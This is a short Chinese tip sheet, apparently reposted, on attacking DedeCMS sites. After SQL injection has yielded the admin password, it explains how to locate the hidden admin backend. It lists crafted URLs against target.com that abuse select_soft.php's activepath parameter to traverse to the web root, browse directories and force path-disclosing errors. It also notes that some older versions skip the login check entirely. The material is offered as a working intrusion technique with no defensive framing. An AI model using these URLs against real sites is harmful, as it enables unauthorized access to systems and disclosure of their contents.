织梦dedecms管理系统后台查找 -电脑资料

    有时在通过注射得到织梦程序的管理密码时，却发现找不到后台地址，

织梦dedecms管理系统后台查找

    这个时候大家可以尝试下在地址后面加上：

    1、/include/dialog/select_media.php?f=form1.murl

    2、/include/dialog/select_soft.php

    但不一定通杀。。

    以下为逍遥复仇整理的dede一些小问题，希望对大家有用：

    DedeCmsV5.1 FreeSP1

    访问http://target.com/include/dialog/select_soft.php?activepath=/include/FCKeditor可以跳转目录

    跳转到根目录的方法为：

    http://target.com/include/dialog/select_soft.php?activepath=/././././././././

    而且DEDECMS在访问不存在的目录时会报错

    如访问http://target.com/include/dialog/select_soft.php?activepath=/st0pst0pst0pst0pst0pst0pst0pst0p

    DedeCMS V5.3.1和最新的DedeCMS V5.5正式版，发现这两个版本已经进行了处理，而且只会列出目录和一些允许显示的文件，PHP是不能显示了，爆路径是一样通用的

    构造http://target.com/include/dialog/select_soft.php?activepath=/include/FCKeditor也可以浏览此目录下的文件，当然你也可以跳到别的目录，但长度一定要大于设置中的目录，

电脑资料

    不过前提是你要登陆下才能利用，这个就显得有点鸡肋了

    另外一些低版本的DEDECMS访问这个页面的时候会直接跳过登陆验证，直接显示,而且还可以用/././././././././掉到根目录去。不过这些版本的访问地址有些不同。

    地址为http://target.com/require/dialog/select_soft.php?activepath=/././././././././